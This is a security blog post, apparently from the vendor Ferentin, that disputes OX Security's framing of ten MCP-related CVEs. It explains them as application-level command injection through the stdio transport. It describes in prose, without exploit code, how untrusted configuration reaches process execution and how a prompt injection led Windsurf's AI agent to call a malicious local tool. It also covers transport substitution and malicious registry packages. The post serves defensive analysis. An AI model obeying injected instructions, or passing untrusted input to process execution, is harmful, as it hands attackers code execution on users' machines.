
"The Mother of All AI Supply Chains" — Or Just the Same Old CLI Problem
OX Security recently published research they titled "The Mother of All AI Supply Chains," describing what they call a critical, systemic vulnerability at the core of Anthropic's Model Context Protocol. The report discloses 10 CVEs across popular AI frameworks, claims 150 million downloads and 200,000 servers are at risk, and argues that Anthropic's refusal to patch constitutes negligence.
The CVEs are real. The responsible disclosure work is valuable. But the framing is wrong in a way that matters for every organization evaluating MCP for production use.
The vulnerability is not in the MCP protocol. It is in how applications handle local process execution. Understanding this distinction is the difference between informed risk management and abandoning a sound protocol over a misattributed threat.
What OX Actually Found
Every CVE in the report follows the same pattern: an application accepts untrusted input and passes it to StdioServerParameters, the SDK construct that launches a local process and communicates with it over stdin/stdout.
The MCP specification defines multiple transports. Stdio is one. It exists for a specific use case: running a local server process on the same machine as the client. A Python script that reads your filesystem. A Node.js tool that queries a local database. The client spawns the process, sends JSON-RPC messages over stdin, and reads responses from stdout.
For stdio to work, it must execute a command. That is the entire purpose of the transport. The command starts the server process. If an application lets an untrusted user control which command gets executed, that is command injection in the application, not a flaw in the transport.
Look at the CVEs individually:
LiteLLM (CVE-2026-30623): An authenticated user can set arbitrary JSON configuration that flows into the stdio command. The application trusts user-supplied configuration to specify what process to run.
Agent Zero (CVE-2026-30624): An unauthenticated web UI lets anyone configure MCP server commands. No input validation, no allowlist, no authentication.
Fay Framework (CVE-2026-30618): An unauthenticated web GUI passes input directly to process execution.
Windsurf (CVE-2026-30615): A prompt injection attack tricks the IDE's AI agent into calling a malicious local tool. The IDE's agent loop does not validate tool invocations against a policy.
DocsGPT (CVE-2026-26015): A man-in-the-middle attack substitutes the transport type, forcing stdio where HTTP was configured. The application does not verify transport integrity.
Every one of these is an application-level input validation failure. The pattern is identical to SQL injection: a protocol (SQL) defines a query language; an application passes untrusted input into a query string; the resulting injection is not a vulnerability in SQL.
The Conflation
OX's report conflates three distinct things:
The MCP specification is a JSON-RPC 2.0 protocol that defines how clients and servers exchange messages about tools, resources and prompts. It specifies message formats, capability negotiation and session management. It does not specify how servers are deployed or what trust boundaries exist between client and server.
The stdio transport is one of several transports defined in the specification. It exists for local development and desktop tooling. It spawns a process and communicates via pipes. By definition, it executes commands on the local machine.
Applications that misuse stdio accept untrusted input and pass it to process execution without validation. This is the vulnerability. It exists in the applications, not in the transport, and certainly not in the protocol.
Claiming this is "a critical systemic vulnerability at the core of MCP" is like claiming HTTP has a remote code execution vulnerability because a web application passes user input to os.system() in a CGI script. The protocol is not the problem. The application is.
Why Anthropic Declined to Patch
OX reports that Anthropic called the behavior "expected" and declined to modify the protocol's architecture. This framing implies negligence. In reality, it reflects a correct assessment of where the security boundary lies.
What would a "patch" to stdio look like? An allowlist of permitted commands? That would break every MCP server in existence, since each one has a different binary name. A sandbox around process execution? That is an operating system concern, not a protocol concern. A warning label in the SDK? The SDK documentation already states that stdio executes local processes. The entire API surface makes this explicit.
The fix belongs where the vulnerability exists: in applications that pass untrusted input to process execution. Each CVE in the report was fixable at the application layer. Several have already been patched there.
The Real Problem: CLIs as a Trust Model
Where OX's research does point to something important is the broader pattern of treating CLIs and local tool execution as safe by default.
The stdio transport inherits the trust model of command-line tools: the user who invokes the command has already decided to trust it. This works for a developer running npx @modelcontextprotocol/server-filesystem /home/user/documents in their terminal. They chose the package. They chose the directory. They understand the blast radius.
It breaks when that same stdio invocation is:
- Triggered by an AI agent that was tricked by a prompt injection
- Configured through a web UI that accepts untrusted input
- Specified in a JSON config file downloaded from an unverified source
- Selected from a marketplace where package names can be typosquatted
This is the class of risk we identified early when designing Ferentin's architecture. Local tool execution is inherently high-trust. The process runs with the user's permissions. It can read files, make network requests, execute other processes. There is no isolation boundary between the MCP server and the rest of the system unless the operating system provides one.
For desktop AI assistants and developer tools, this trust model is sometimes appropriate, with informed consent. For production enterprise deployments, it is not.
Remote HTTP: A Different Trust Model
The MCP specification's Streamable HTTP transport operates under a fundamentally different trust model. The server is a remote HTTP endpoint. The client sends JSON-RPC messages over HTTPS. No local process is spawned. No command is executed on the client machine.
The security properties of this transport are the same as any authenticated API:
Network isolation. The server runs in its own environment, behind its own firewall, with its own credentials. Compromising the client does not compromise the server, and vice versa.
Authentication and authorization. HTTP transports support standard authentication: OAuth 2.0, bearer tokens, mTLS. Every request can be authenticated, authorized and attributed to an identity.
Policy enforcement. A gateway between client and server can evaluate policies on every tool invocation: which users can call which tools, with what parameters, under what conditions.
Audit logging. Every request and response is observable. Tool calls can be logged, monitored, alerted on and reviewed after the fact.
No process execution on the client. The client sends a JSON-RPC request. The server decides what to do with it. The client never executes arbitrary commands.
None of the CVEs in OX's report apply to this architecture. There is no StdioServerParameters. There is no local process to inject into. The attack surface is the HTTP endpoint, which is protected by the same mechanisms that protect every other API in the enterprise.
The Marketplace Problem Is Real but Not MCP-Specific
OX reports that 9 of 11 MCP registries accepted a malicious proof-of-concept package. This is a genuine supply chain concern and it deserves attention.
But it is not an MCP-specific problem. The same attack works on npm, PyPI, Docker Hub, Homebrew taps, VS Code extensions and every other package ecosystem that accepts community contributions without rigorous verification. Typosquatting, namespace confusion and malicious packages are an industry-wide challenge.
The mitigation is also industry-standard: verified publishers, code signing, namespace governance and curated catalogs. For enterprise MCP deployments, this means administrators should control which MCP servers are available to their users, not leave it to individual developers to install arbitrary packages from unverified registries.
What This Means for Enterprise MCP Adoption
If you are evaluating MCP for production use, the OX report should not change your assessment of the protocol. It should sharpen your requirements for how MCP servers are deployed and managed.
Use remote HTTP transports for production workloads. Stdio is appropriate for local development. Production MCP servers should be remote HTTP endpoints with proper authentication, network isolation and monitoring.
Do not let end users configure MCP server connection parameters. Server configuration is an administrative function. If users can specify arbitrary server URLs or commands, you have an injection surface.
Deploy MCP servers behind a gateway with policy enforcement. Every tool invocation should be evaluated against a policy before execution. The policy should consider the user's identity, the tool being called, the parameters being passed and the context of the request.
Curate your MCP server catalog. Do not rely on public registries for production deployments. Vet servers, pin versions, verify integrity and control what is available to your users.
Monitor tool invocations. Log every tool call, every response and every error. Alert on anomalies. Review patterns. The telemetry from MCP tool calls is as important as the telemetry from any other API.
These are not novel requirements. They are the same requirements you apply to every other API, service and integration in your enterprise. MCP is a protocol. Protocols need infrastructure around them to be secure. That infrastructure is what separates a proof of concept from a production deployment.
Our Perspective
We built Ferentin as an MCP-native platform from day one. Every MCP interaction flows through Streamable HTTP, authenticated by OAuth 2.0 or bearer tokens, evaluated against tenant-scoped policies, logged for audit and compliance. No stdio. No local process execution. No implicit trust.
When we read OX's report, we recognized the pattern immediately. It is the same class of risk that led us to design the platform the way we did. Local tool execution without policy enforcement, identity attribution and isolation is not a foundation for enterprise AI.
The MCP protocol itself is sound. JSON-RPC 2.0 over HTTP with capability negotiation, session management and structured tool schemas is a solid foundation for AI agent communication. The question is not whether MCP is secure. It is whether your deployment of MCP is secure. And that depends entirely on the infrastructure you put around it.
If you are building production MCP infrastructure and want to discuss architecture, security models or deployment patterns, reach out. We have been thinking about this for a while and we are happy to share what we have learned.
Stay in the loop
Get the latest on enterprise AI security delivered to your inbox.